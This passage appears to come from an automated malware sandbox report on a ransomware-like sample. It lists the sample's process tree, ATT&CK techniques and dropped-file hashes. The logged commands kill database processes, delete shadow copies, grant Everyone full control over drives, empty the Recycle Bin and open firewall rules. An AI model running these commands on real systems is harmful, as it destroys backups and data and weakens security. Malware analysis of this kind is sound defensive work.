    "taskkill.exe" /IM oracle.exe /f
    3⤵
    - Kills process with taskkill
    PID:2164
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sql.exe /f
    3⤵
    PID:5300
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysql.exe /f
    3⤵
    - Kills process with taskkill
    PID:4880
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /f
    3⤵
    PID:5276
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM vmwp.exe /f
    3⤵
    PID:5088
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM 1cv8.exe /f
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:5332
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5764
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5208
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5236
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /C C:\Windows\TEMP\tmp292F.bat
    3⤵
    PID:4628
  - - C:\Windows\system32\mountvol.exe
      mountvol
      4⤵
      PID:4036
  - - C:\Windows\system32\find.exe
      find "}\"
      4⤵
      PID:2592
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
      4⤵
      PID:6052
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:6040
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
      4⤵
      PID:3576
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:4176
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
      4⤵
      PID:4980
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:4500
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:5484
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:4244
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5644
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:4064
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:3396
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:5652
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\1618038130 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5408
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4416
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4552
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5740
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5424
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:1072
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3532
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3816
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-065959-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4076
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070122-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5304
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070349-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6096
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070541-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5364
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:2508
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2620
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4240
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3120
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4556
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5232
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5536
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04102021-065958.log /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:1596
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04102021-065958.log /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4932
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04102021-065958-00000003-ffffffff.bin /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2504
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5336

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4304

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
cd5b15b46b9fe0d89c2b8d351c303d2a

SHA1
e1d30a8f98585e20c709732c013e926c7078a3c2

SHA256
0a8a0dcbec27e07c8dc9ef31622ac41591871416ccd9146f40d8cc9a2421da7a

SHA512
d7261b2ff89adcdb909b775c6a47b3cd366b7c3f5cbb4f60428e849582c93e14e76d7dcadec79003eef7c9a3059e305d5e4f6b5b912b9ebc3518e06b0d284dd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f99cbeace58cd761a29aaaaaa063e388

SHA1
0cfde160845a473db2731cb2aeea76a1010bd236

SHA256
2f48d6f061a783a32ba9d390cd421bbcc0236e7c06d7fc54e09bf9d328ca36dd

SHA512
1d18b0f7d954a9d77d5aa0029a739e05c9d7a6727dc653805e9cfe17f8014c50125c2280748cc1a8082b2c9d47c5aa2c94d21ab56de08f731fff92cf0407b792

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f99cbeace58cd761a29aaaaaa063e388

SHA1
0cfde160845a473db2731cb2aeea76a1010bd236

SHA256
2f48d6f061a783a32ba9d390cd421bbcc0236e7c06d7fc54e09bf9d328ca36dd

SHA512
1d18b0f7d954a9d77d5aa0029a739e05c9d7a6727dc653805e9cfe17f8014c50125c2280748cc1a8082b2c9d47c5aa2c94d21ab56de08f731fff92cf0407b792

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
70dec6e492ca5dc1cd9a246e858eb27e

SHA1
7be9138545e2d787c5964d270d44570a85a764c9

SHA256
e565bdab9fe076afeb6d9516aa653a2f014534d33c28b1f2c2d29f5f2ce0c43a

SHA512
f38ecfa0780291f6df7639818d9e1801e29c6d41d6afe17f58a69899de303f00a0d27961e3f0d7f25bc44dd96813234db0f15c3b49fb3b7f53497b53b1785eb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
103069fc42a9ab294812feb0c658c742

SHA1
2533e8d688f75a5b5dd66168d0509aed698fac61

SHA256
a3cabf0f441b129a82fc40d7c6b309e288bb8c50e3e1f60de6b5a52f6cdcd7f5

SHA512
45e4f1e3629bfd5c2acd8de208e4c91842954b871445beb47f3232fe19d74e8a6f845868f9557025d100b5014e0d75df2294cca5c01d0b01bac117d2ed2bcbb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
c361bc619197a25d6fdc94e44c776690

SHA1
4506b8a248fd7a297132f13ed46b8fbc475de560

SHA256
ccbb78a9687d796bc62c4186b820c8ad5d59662d2a9d074bd7afd4443080436f

SHA512
ec64265a3ba65a3e3deaa56341e967c407d9633950c0c5b714306207aff0a0410f74f6484a07a744670f933c44472575a8af13c2ef688f913758707aadc5885e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
747363395c309195ffd54cf1b66ecef8

SHA1
bc0880c781aa3f13d86de7368aa4943e3152cc72

SHA256
7bab0d8d4545ab5639fa62bd2a5fbf5211ff8bb56eb323648c3afc5b3fa0d431

SHA512
ebcca3dfc3668d7b861c2d5adba7aeed6e9047c290bd640cb8ec51af5bcc94a80cda80827d409424a8c57491092acc90cb7adc844782f32ac1a4bff2fefc06d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
ecefcdcc5f892f768c432b299c347db5

SHA1
7e9da90a0214f49dffdee4e11120090afee24767

SHA256
dce643b0efbaa0bc2539c8b2cd52eeee7122c3acb5a0b841a443ac0617bbb69b

SHA512
89631259dae564092949df9bbbb1d8c2bb0859ba0f5df739ca3e06da0e559f56548e17567f3730204711fc63ab1ba54cdf72d50532bfe92500cf3f39e3a0bdcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
ecefcdcc5f892f768c432b299c347db5

SHA1
7e9da90a0214f49dffdee4e11120090afee24767

SHA256
dce643b0efbaa0bc2539c8b2cd52eeee7122c3acb5a0b841a443ac0617bbb69b

SHA512
89631259dae564092949df9bbbb1d8c2bb0859ba0f5df739ca3e06da0e559f56548e17567f3730204711fc63ab1ba54cdf72d50532bfe92500cf3f39e3a0bdcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
c0846122879f87a5974ac0657c0d7838

SHA1
6ddb8449cecc674d8d5711d8cdf8be06ed92af5a

SHA256
e9c45a174b9bddc08604871bbf02f4ebfedf24ca780541b2429b145e0acd435d

SHA512
d947fc5aa9c6bc6f9f9f8f5bbad58e88d7ac2d85e072f48e8f8232ae5a5a241061d3c6a5f811e6dd127ebbdb44793818aee87810f653cbbc6f6265d8f7cef8e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
8ac9f0d7186be312e6e623cbc613e80f

SHA1
9462fde94e554a5e1a40fe2e383ba5171c9be452

SHA256
7cbe22d8d9fa3e257e1510b8eb5635e2cddd3012ff9263901e5c46ff8bed5f8d

SHA512
b114e7752d70767a0f22622bcd8234ecc513a8e74fe0c502bf71996b7ce3aca490300aaf09ad1403e2ed0a25fde534b7d93aa85ceb802cc53fcd46ee36a45fe8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
620d85dbbe0e413ee13ac0cd70651837

SHA1
934ff78c4f400f676aee3a1b6151d01c57b94662

SHA256
277d2fd2fcd555cca6a2ac9c979870a23ab9753b6e619199f97c6e5e59de1fc6

SHA512
2c0c8f1a108a90057da8bfc6210f121361b6abbce7b161ab047dc3d94764e194c65454cd31822bf86d77b032cbf32c7fd7fb979466cb46267414202142eada08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
620d85dbbe0e413ee13ac0cd70651837

SHA1
934ff78c4f400f676aee3a1b6151d01c57b94662

SHA256
277d2fd2fcd555cca6a2ac9c979870a23ab9753b6e619199f97c6e5e59de1fc6

SHA512
2c0c8f1a108a90057da8bfc6210f121361b6abbce7b161ab047dc3d94764e194c65454cd31822bf86d77b032cbf32c7fd7fb979466cb46267414202142eada08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
b5d9f4aeee6432502d8f10a6b5bb3125

SHA1
e6e025280a86212bf9637db394d09e6a3f1e67ad

SHA256
a624a54baaf4642b325f7638fcfda36245792809ddce118a8216d57264595f13

SHA512
d8244aef48376fc0b604adcf93ea77dca561ce8fdba5a42638eeac9e785230367f6950141688f2f106807772ec2c2a5025f4fcf652e5d5e34a7112731f76b5de

Download Submit
C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

MD5
3de060c1a25fb75735767e9450ed797d

SHA1
8c0e899fc89aa8e0201aa8ee4ba41cd05702116e

SHA256
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698

SHA512
4792c3c919c87269544bbe60b62930059f71421eae0a736113e4472e14cfebf95b16ebc430e441a88655fcb84397d5959367061e59d58deaf26de43915eea37b

Download Submit
C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

MD5
3de060c1a25fb75735767e9450ed797d

SHA1
8c0e899fc89aa8e0201aa8ee4ba41cd05702116e

SHA256
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698

SHA512
4792c3c919c87269544bbe60b62930059f71421eae0a736113e4472e14cfebf95b16ebc430e441a88655fcb84397d5959367061e59d58deaf26de43915eea37b

Download Submit
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCBA2.bat

MD5
1af2c796c268a8160d0d93e8866dc7b0

SHA1
6d786ee5bf9cb9b1da115ce6daffe1e7b5ef988f

SHA256
94e31962442ee5f22c9ff8f6539c214dabf49e1b672a91cb042e2c0c1369abc8

SHA512
af10c10ef2c7f976ebc52201d17c95cb2a5c433d39c7d722b0c1f56cb48fa27c07cf60e7de8c2d9974f6594212eb02568007da90e49ba3bca226efbe8943271e

Download Submit
C:\Users\Admin\AppData\Local\Temp\v.txt

MD5
ca6bcc5268aef2af5f961114dc0541f0

SHA1
2e703b60c8011751a57dbccc5c1114ec0fa419ca

SHA256
a965b5d1d7367e22eb1d5698b7207790f85a8f281429124e9f45b116388415e7

SHA512
720c2479fb5aa1a6898c67b416370fa77cdbe7cb2a849882a8a5412ebdd0d0001d15da5b1b63e19704ba4732c617f058d503dae126533fb0226535629ab3b94f

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
5742e3c624dabb0af08b558ff791c190

SHA1
ab061bfee4c48443594710057ccb53268cc81fb9

SHA256
56b6b24c8d5694b598d4259cd009356e0b6d2169646393d2324200fe05bbf8b8

SHA512
794b173c183db2cc92a1cf656028763834a8c2f9bff5f2588560134cc3383bb186b8911a7d83b5af335abd19641c90b357bfe23e17dea678308c9940dc8116ae

Download Submit
C:\Windows\TEMP\tmp292F.bat

MD5
1af2c796c268a8160d0d93e8866dc7b0

SHA1
6d786ee5bf9cb9b1da115ce6daffe1e7b5ef988f

SHA256
94e31962442ee5f22c9ff8f6539c214dabf49e1b672a91cb042e2c0c1369abc8

SHA512
af10c10ef2c7f976ebc52201d17c95cb2a5c433d39c7d722b0c1f56cb48fa27c07cf60e7de8c2d9974f6594212eb02568007da90e49ba3bca226efbe8943271e

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
70b3ee3839890cd6e33de100160aa0f3

SHA1
ea985ff7cc4164f5f436cb0ab193bd598fd51a49

SHA256
fe9953998fabade77ae9294bb7fedfe83a59e7289a7dece404a8c82f15f7e46e

SHA512
5f12857006e4f6fe1130f2135a13575f606d3d7863cdcfdd207443bbfb9039b3b041cfb48ea5dd8daec318a7287891d3bfb2086c23bf6b0aa09bc254330274da

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
082e5a07959f48344938cbd244eca6d2

SHA1
e437e8c07a2c35b4f0038d6dd74e3218b2612f60

SHA256
a0875ef3b8f3c3cf8b6fbc656b8eb88c975a6f0c777e45dad26dbb0f4a8ea087

SHA512
bc80bfba0f2b38257089cf9b3258ab56db4a2f2872138703b193c1a278b1e28afe73b7b8c68880bdabd8f43d8bb22cc116ea4f0c89e636e1e668747d1714b61a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
79ca8be86f018aead5ae9a80162821d7

SHA1
d9efac5038217026a073b481831bc23728d6e19b

SHA256
e2e0e5023e896adf07526e6e7dd2b4f821fa81d08db4c8f960fbcc0c06122c48

SHA512
